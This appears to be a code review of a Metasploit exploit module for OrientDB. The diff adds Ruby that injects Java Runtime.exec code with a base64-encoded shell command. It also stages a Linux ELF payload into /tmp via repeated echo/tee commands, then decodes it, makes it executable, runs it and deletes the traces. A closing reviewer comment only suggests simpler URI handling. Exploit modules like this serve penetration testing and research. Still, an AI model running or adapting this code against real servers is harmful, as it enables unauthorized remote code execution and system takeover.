modules/exploits/multi/http/orientdb_exec.rb

```diff
@@ -0,0 +1,258 @@
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'headers' => { 'Accept' => '*/*' },
+      'data' => ""
+    }
+    rer = send_request_raw(request_parameters)
+    if not (rer and rer.code == 204)
+      begin
+        json_body = JSON.parse(res.body)
+      rescue JSON::ParserError
+        fail_with(Failure::Unknown, 'Failed to delete the malicious function.')
+        return
+      end
+    end
+  end
+
+  def java_craft_runtime_exec(cmd)
+    decoder = Rex::Text.rand_text_alpha(5, 8)
+    decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
+    cmd_array = Rex::Text.rand_text_alpha(5, 8)
+    jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
+    jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
+    jcode << "String [] #{cmd_array} = new String[3];\n"
+    if target['Platform'] == 'win'
+      jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
+      jcode << "#{cmd_array}[1] = \"/c\";\n"
+    else
+      jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
+      jcode << "#{cmd_array}[1] = \"-c\";\n"
+    end
+    jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
+    jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
+    jcode
+  end
+
+  def on_new_session(client)
+    if not @to_delete.nil?
+      print_warning("Deleting #{@to_delete} payload file")
+      execute_command("rm #{@to_delete}")
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status("Attempting to execute: #{cmd}")
+    @uri = target_uri
+    @uri.path = normalize_uri(@uri.path)
+    @uri.path << "/" if @uri.path[-1, 1] != "/"
+    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
+    if res && res.code == 200 && res.body.length > 0
+      begin
+        json_body = JSON.parse(res.body)["databases"]
+      rescue JSON::ParserError
+        print_error("Unable to parse JSON")
+        return
+      end
+    else
+      print_error("Timeout or unexpected response...")
+      return
+    end
+    targetdb = json_body[0]
+    http_send_command(cmd,targetdb)
+  end
+
+  def linux_stager
+    cmds = "echo LINE | tee FILE"
+    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+    base64 = Rex::Text.encode_base64(exe)
+    base64.gsub!(/\=/, "\\u003d")
+    file = rand_text_alphanumeric(4+rand(4))
+    execute_command("touch /tmp/#{file}.b64")
+    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
+    base64.each_line do |line|
+      line.chomp!
+      cmd = cmds
+      cmd.gsub!(/LINE/, line)
+      execute_command(cmds)
+    end
+    execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
+    execute_command("chmod +x /tmp/#{file}")
+    execute_command("rm /tmp/#{file}.b64")
+    execute_command("/tmp/#{file}")
+    @to_delete = "/tmp/#{file}"
+  end
+
+  def exploit
+    @uri = target_uri
+    @uri.path = normalize_uri(@uri.path)
+    @uri.path << "/" if @uri.path[-1, 1] != "/"
```

Comment:
If you're using `normalize_uri` then in theory you shouldn't need to do this check for `/` as `normalize_uri` will take care of formatting the URL for you.

For example, `{'uri' => normalize_uri(target_uri.path), 'listDatabases'}`